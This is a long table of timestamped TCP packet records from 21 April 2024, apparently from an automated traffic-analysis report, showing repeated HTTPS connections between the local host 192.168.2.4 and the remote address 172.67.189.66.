                                                                                                                                            Apr 21, 2024 15:31:25.627125025 CEST44349758172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:25.627156019 CEST49760443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:25.627182007 CEST44349760172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:25.627238989 CEST49760443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:25.628170013 CEST49759443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:25.628223896 CEST44349759172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:25.628405094 CEST49760443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:25.628431082 CEST44349760172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:25.628632069 CEST44349759172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:25.629621983 CEST49759443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:25.629723072 CEST49759443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:25.629775047 CEST44349759172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:25.847788095 CEST44349760172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:25.847862959 CEST49760443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:25.849229097 CEST49760443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:25.849244118 CEST44349760172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:25.849600077 CEST44349760172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:25.851356030 CEST49760443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:25.851581097 CEST49760443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:25.851614952 CEST44349760172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.135431051 CEST44349758172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.135545969 CEST44349758172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.135658026 CEST49758443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.135696888 CEST49758443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.144119024 CEST44349759172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.144371986 CEST44349759172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.144423008 CEST49759443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.144489050 CEST49759443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.161205053 CEST49761443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.161273003 CEST44349761172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.161350965 CEST49761443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.161696911 CEST49761443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.161731958 CEST44349761172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.380247116 CEST44349761172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.380562067 CEST49761443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.381700039 CEST49761443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.381731033 CEST44349761172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.381951094 CEST44349761172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.383657932 CEST49761443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.383728981 CEST49761443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.383743048 CEST44349761172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.403476954 CEST44349760172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.403598070 CEST44349760172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.403893948 CEST49760443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.403939009 CEST49760443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.403960943 CEST44349760172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.417620897 CEST49762443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.417654037 CEST44349762172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.417943954 CEST49762443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.418185949 CEST49762443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.418200016 CEST44349762172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.580249071 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.580346107 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.584189892 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.584599972 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.584635019 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.640948057 CEST44349762172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.641323090 CEST49762443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.642519951 CEST49762443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.642534018 CEST44349762172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.642865896 CEST44349762172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.644247055 CEST49762443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.644247055 CEST49762443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.644273043 CEST44349762172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.763214111 CEST44349761172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.763309002 CEST44349761172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.763358116 CEST49761443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.763417006 CEST49761443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.763433933 CEST44349761172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.804188013 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.804259062 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.805485010 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.805512905 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.805903912 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.807151079 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.807849884 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.807893038 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.808053970 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.808096886 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.808218956 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.808341026 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.808497906 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.808537960 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.808736086 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.808783054 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.808959961 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.809017897 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.809045076 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.809056997 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.809204102 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.809243917 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.809284925 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.809467077 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.809518099 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.856117964 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.856401920 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.856493950 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.856545925 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.904118061 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:26.904249907 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.943413973 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:26.943475962 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.185971022 CEST44349762172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.186265945 CEST44349762172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.186317921 CEST49762443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.186348915 CEST49762443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.186364889 CEST44349762172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.425466061 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.425503016 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.425556898 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.426055908 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.426073074 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.643686056 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.643779993 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.647638083 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.647646904 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.647851944 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.649435997 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.650154114 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.650182962 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.650278091 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.650310040 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.650460958 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.650497913 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.650650024 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.650685072 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.650832891 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.650868893 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.652666092 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.652697086 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.652707100 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.652723074 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.652916908 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.652944088 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.652964115 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.656678915 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.656712055 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.696150064 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.696754932 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.696784973 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.696808100 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.696827888 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.696849108 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.696862936 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.696942091 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.696963072 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.699273109 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.699388981 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.699464083 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.699618101 CEST49763443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.699662924 CEST44349763172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.781052113 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.781120062 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:27.781203985 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.781653881 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:27.781686068 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.001631975 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.001714945 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.003046036 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.003063917 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.003405094 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.004704952 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.005628109 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.005683899 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.005789042 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.005840063 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.005981922 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.006022930 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.006162882 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.006201029 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.006361961 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.006398916 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.006613016 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.006654978 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.048162937 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.048409939 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.048477888 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.096143007 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.096328974 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.096407890 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.096432924 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.144141912 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.144346952 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.144399881 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.192117929 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.192285061 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.214385033 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.214481115 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.214627981 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:28.214657068 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:28.423871040 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:29.219578981 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:29.219679117 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:29.219897985 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:29.220118046 CEST49764443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:29.220139027 CEST44349764172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:29.576565981 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:29.576746941 CEST44349765172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:29.576908112 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:29.576970100 CEST49765443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:33.056457043 CEST49766443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:33.056507111 CEST44349766172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:33.056564093 CEST49766443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:33.057816982 CEST49766443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:33.057828903 CEST44349766172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:33.277770042 CEST44349766172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:33.277853012 CEST49766443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:33.279408932 CEST49766443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:33.279417992 CEST44349766172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:33.279732943 CEST44349766172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:33.334022045 CEST49766443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:33.346985102 CEST49766443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:33.347012997 CEST49766443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:33.347074986 CEST44349766172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:33.817008972 CEST44349766172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:33.817101002 CEST44349766172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:33.817205906 CEST49766443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:33.817434072 CEST49766443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:33.817447901 CEST44349766172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:33.817457914 CEST49766443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:33.817462921 CEST44349766172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:33.821299076 CEST49767443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:33.821366072 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:33.821451902 CEST49767443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:33.821783066 CEST49767443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:33.821818113 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.038543940 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.038697958 CEST49767443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.039875031 CEST49767443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.039904118 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.040139914 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.041327000 CEST49767443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.041368961 CEST49767443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.041409016 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.449635983 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.449708939 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.449743986 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.449795961 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.449851036 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.449862957 CEST49767443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.449887037 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.449943066 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.449999094 CEST49767443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.449999094 CEST49767443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.450021029 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.450089931 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.450124025 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.450153112 CEST49767443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.450160980 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.450175047 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.450232029 CEST49767443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.450305939 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.450364113 CEST49767443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.450364113 CEST49767443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.451323986 CEST49767443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.451358080 CEST44349767172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.487440109 CEST49768443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.487468958 CEST44349768172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.487629890 CEST49768443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.487931013 CEST49768443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.487938881 CEST44349768172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.706285954 CEST44349768172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.706388950 CEST49768443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.707578897 CEST49768443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.707587004 CEST44349768172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.707796097 CEST44349768172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.710227966 CEST49768443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.710227966 CEST49768443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.710268974 CEST44349768172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:34.710328102 CEST49768443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:34.710335016 CEST44349768172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:35.277228117 CEST44349768172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:35.277318954 CEST44349768172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:35.277385950 CEST49768443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.279442072 CEST49768443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.279469013 CEST44349768172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:35.292637110 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.292732000 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:35.292854071 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.293169975 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.293204069 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:35.510799885 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:35.510971069 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.512057066 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.512093067 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:35.512320995 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:35.513591051 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.513726950 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.513766050 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.034908056 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.034995079 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.035079002 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.035181999 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.035203934 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.076035023 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.076141119 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.076276064 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.076591969 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.076630116 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.290669918 CEST44349770172.67.189.66192.168.2.4
